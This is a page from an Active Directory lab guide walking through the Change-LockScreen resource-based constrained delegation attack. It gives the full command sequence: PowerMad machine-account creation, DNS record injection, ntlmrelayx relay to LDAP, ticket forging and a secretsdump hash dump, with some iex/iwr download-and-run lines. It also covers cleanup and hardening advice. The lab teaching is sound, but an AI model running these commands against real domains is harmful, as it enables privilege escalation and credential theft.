📖
Building a Windows AD lab
  • Building a Windows AD lab
  • Lab-setup
    • Lab overview
    • Building the lab
      • Prerequisite
      • Creating images
        • Optional: Install software & Settings
      • Network setup
      • Cloning & Creating VM's
      • Creating bank.local
        • Creating Domain Controller - DC01
          • Enable RDP
        • Creating amsterdam.bank.local
          • Creating Domain Controller - DC02
            • Creating a AD structure
            • Create a CA
            • Configure LDAPS
          • Creating Fileserver - FILE01
            • File services
          • Creating W10 client - WS01
            • PSRemoting
          • Creating Webserver - WEB01
            • Web Services
            • SQL Server
              • Create database
      • Creating secure.local
        • Creating Domain Controller - DC03
        • Creating File/SQL Server - DATA01
          • SQL Server
            • Create database
    • Attack Paths
      • Attack path 1 (hard)
        • Configuring
        • Tasks
        • Manual
      • Attack path 2
        • Configuring
        • Task
        • Manual
    • Troubleshooting
    • To-Do
  • Vulnerabilities & Misconfigurations & Attacks
    • Initial Access Attacks
      • Username Enumeration
        • Password Spraying
        • AS-REP Roasting
        • Empty Password
      • SMB Relaying
      • SMB Null-Session (To-Do)
      • SQL Server default login
    • Active Directory Attacks
      • Password spraying
      • AS-REP Roasting
      • Empty password
      • Password in description
      • Kerberoasting
      • Delegation Attacks
        • Unconstrained Delegation
          • Printerbug
        • Constrained Delegation
        • Resource Based Constrained Delegation
          • Computeraccount Takeover
          • Change-LockScreen
          • Webclient Attack (todo)
      • DACL-Abuses
        • Write Owner
        • Owns
        • WriteDacl
        • GenericAll
        • GenericWrite (todo)
        • ForceChangePassword
        • Add user to group (todo)
        • Targeted Kerberoast (todo)
        • Get-Changes
      • Reused local administrator (todo)
      • SQL Server Attacks (todo)
        • Initial Access
          • SQL Server default login
          • Normal domain user access
        • Privilege Escalation
          • Impersonation
          • DB-Owner
          • Enumerate Logins
            • Weak passwords
        • Executing Commands
        • Database-Links
        • Capturing hashes & Relaying
      • Reading LAPS passwords (todo)
      • Priviliged Groups (todo)
        • DNS-Admins (todo)
        • Account Operators (todo)
        • Backup Operators
        • Server Operators (todo)
      • Hopping domains and forests
        • Child to parent domain
          • Krbtgt hash
          • Trust key
        • Cross forest Attacks (todo)
          • Foreign user
    • Misc
      • Reverse shell trick
      • Lateral Movement
        • PSRemoting
        • PsExec (todo)
      • Misconfigured Service (todo)
        • Unqouted Service Path
      • Discovering Shares
      • Password on shares
      • Different methods of dumping credentials
        • LSASS (todo)
        • Dumping DPAPI
          • Browser passwords
        • Scheduled tasks (todo)
        • Services (todo)
        • Vssadmin Shadow Copy
      • ms-ds-machineaccountquota (todo)
      • add DNS Records (todo)
      • Bypassing UAC
    • Template page
  • Defence
    • Detection
    • Hardening
      • LDAP
        • LDAP Signing
        • LDAPS Binding
      • Strong Password Policy
      • Change who can join computers to the domain
      • Protected users group
      • Account is sensitive and cannot be delegated
      • Powershell Execution Policy
      • Template page
Powered by GitBook
On this page
  • Configuring
  • Attacking
  • How it works
  • Tools
  • Executing the attack
  • Cleanup
  • Defending
  • Recommendations
  • Detection
  • References
Edit on GitHub
  1. Vulnerabilities & Misconfigurations & Attacks
  2. Active Directory Attacks
  3. Delegation Attacks
  4. Resource Based Constrained Delegation

Change-LockScreen

Abuse the lockscreen image changing functionality to achieve a webdav network authentication as SYSTEM from the given computer. Then relay the authentication to the Active Directory LDAP service in or

PreviousComputeraccount TakeoverNextWebclient Attack (todo)

Last updated 2 years ago

Configuring

  1. Login to WEB01 as the Administrator user with password Welcome01!.

  2. Open PowerShell and execute the following command to enable WebDav.

Install-WindowsFeature WebDAV-Redirector –Restart

2. After the server restarts Open the "Windows Defender Firewall" to open up the SMB port.

3. Click on "Allow an app or feature through Windows Defender Firewall"

4. Select "File and Printer sharing" and click on "OK"

Attacking

How it works

Abuse the lockscreen image changing functionality to achieve a webdav network authentication as SYSTEM from the given computer. Then relay the authentication to the Active Directory LDAP service in order to set up Resource-Based Constrained Delegation to that specific machine.

Tools

Executing the attack

Prerequisite

  • Low priv shell on a machine

  • An account with a SPN associated (or able to add new machines accounts (default value this quota is 10))

  • WebDAV Redirector feature must be installed on the victim machine. (W10 has it by default, but manually installed on server 2016 and later)

  • A DNS record pointing to the attacker’s machine (By default authenticated users can do this)

Executing the attack

  1. It is expected that a low privileged shell is already gained on Web01 through the SQL server.

2. Get the machine account Qouta from the domain with crackmapexec:

crackmapexec ldap 10.0.0.5 -u richard -p Sample123 -M MAQ

The machine account qouta is 10, meaning we (all authenticated users) can create our own computerobject in the domain.

2. Create machine account FAKE01 with password 123456 with PowerMad:

iex (iwr http://192.168.248.3:8090/Powermad.ps1 -usebasicparsing)
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

3. Create a DNS record for webdav to our attacking machine with Invoke-DNSUpdate. The DNS record is required for webdav connection to work. It won't connect through an IP only with a hostname. We create a DNS record webdav.amsterdam.bank.local to our attacking machine IP.

iex (iwr http://192.168.248.3:8090/Invoke-DNSUpdate.ps1 -usebasicparsing)
Invoke-DNSUpdate -DNSType A -DNSName webdav.amsterdam.bank.local -DNSData 192.168.248.3 -Realm amsterdam.bank.local

We now have all our prerequisites. Time to escalate our privileges.

4. Run NTLMRelay on our Kali machine and set it up so it will write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute that allows our created computerobject FAKE01 to actonbehalf WEB01:

python3 /opt/impacket/examples/ntlmrelayx.py -t ldap://10.0.0.3 --delegate-access --escalate-user FAKE01$ --serve-image ./image.jpg

5. Run the Change-LockScreen tool in the shell of WS01 and check the ntlmrelay output. The Change-LockScreen command will give an error but this doesn't matter:

iex (iwr http://192.168.248.3:8090/Change-Lockscreen.ps1 -usebasicparsing)
change-lockscreen -webdav \\webdav@80\

When we check the ntlmrelay output we see that FAKE01 can now impersonate users on WEB01.

If we open the attribute editor on DC02 for WEB01 we can see the msDS-AllowedToActOnBehalfOfOtherIdentity attribute:

6. Create a CIFS service ticket using FAKE01 impersonating the domain admin Administrator using impackets getST.py. Fill in the password 123456.

getST.py amsterdam/FAKE01@10.0.0.5 -spn cifs/web01.amsterdam.bank.local -impersonate administrator -dc-ip 10.0.0.3

7. Use this ticket and run secretsdump.py to dump the local admin hashes of WEB01.

export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass web01.amsterdam.bank.local

Cleanup

  1. Login to DC02 as Administrator with the password Welcome01!.

  2. Execute the following command to remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute from WEB01.

Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null -Identity web01

3. Execute the following command to remove the FAKE01 computer we created:

Get-ADComputer fake01 | Remove-ADObject

4. Open "DNS Manager" and expand DC02 --> Forward Lookup Zones --> and click on Amsterdam.bank.local.Remove the DNS-record created for webdav:

4. From our Kali machine set the SQL server settings back:

mssql-cli -S 10.0.0.5 -U sa -P sa
EXEC sp_configure 'xp_cmdshell',0
RECONFIGURE
EXEC sp_configure 'show advanced options',0
RECONFIGURE

Defending

Recommendations

  • Change who can add computers to the domain.

  • Add privileged users to the protected users group.

  • Add the flag "Account is sensitive and cannot be delegated".

  • Remove the WebDav client from servers and workstations.

Detection

References

Powermad
Invoke-DNSUpdate
Change-LockScreen
Impacket
Executing Commands
Change who can join computers to the domain
Protected users group
Account is sensitive and cannot be delegated
Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege EscalationNCC Group Research
GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit toolsGitHub
Powermad/Invoke-DNSUpdate.ps1 at master · Kevin-Robertson/PowermadGitHub
GitHub - SecureAuthCorp/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub
Logo
Logo
Logo
Logo